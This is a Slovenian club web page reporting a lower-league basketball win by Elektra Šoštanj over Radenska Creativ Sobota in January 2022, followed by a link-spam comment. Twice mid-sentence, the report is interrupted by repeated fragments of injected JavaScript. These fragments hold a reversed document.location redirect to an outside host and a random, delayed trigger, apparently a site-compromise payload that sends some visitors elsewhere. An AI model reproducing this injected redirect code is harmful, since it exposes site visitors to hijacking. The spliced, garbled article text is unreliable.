4 LIGA KZS: RADENSKA BREZ MOŽNOSTI V ŠOŠTANJU

Radenska Creativ Sobota, ki je v Šoštanj prišla le z 8 igralci, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokrat ni bila kos razigrani domači ekipi, ki je imela na voljo praktično vse košarkarje. Je pa manjkal trener Duško Maličević zaradi okužbe s koronavirusom, kar pa na srečo ni imelo negativnega vpliva na ekipo. Vlogo trenerja je prevzel kapetan Aldin Hasić, ki jo je opravil več kot uspešno. Priložnost za igro so dobili vsi košarkaji. Posledično je bilo ogromno tehničnih napak, vseeno pa veseli dejstvo, da je svojo priložnost za večjo minutažo s pridom izkoristila večina igralcev. V prvi četrtini so gostje še držali priključek, v drugi četrtini pa so košarkaji Elektre s conskim presingom po celem igrišču prisilili nasprotnika v nekaj izgubljenih žog. Doseženih je bilo veliko lahkih košev iz protinapadov in razlika je tako naraščala iz minute v minutobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to. Članski ekipi Elektre je po nekaj letni odsotnosti ponovno pridružil tudi Kaj Špegel.

15.01.2022, 19:00, Športna dvorana Šoštanj, 10. kolo

ELEKTRA ŠOŠTANJ 93:57 RADENSKA CREATIV SOBOTA
(20 : 14, 20 : 10, 25 : 17, 28 : 16)

Ojsteršek B. 24, Sovič 20, Razdevšek 12, Ojsteršek V. 8, Hasić 8, Ferenc T. 7, Babajić 6, Aračič 4, Špegel 2, Stropnik 2.

Statistika

Naslednja tekma bo  22. januarja 2022, ko Elektra gostuje na Vranskem.

 

1 Komentar

  • gate io logo Reply

    29. januarja, 2023 at 1:37

    My colleague shared your article with me and I found it very useful after reading it. Great article, it helped me a lot. I also hope to make a beautiful website like your blog, hope you can give me some advice, my website:
    gate io logo

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki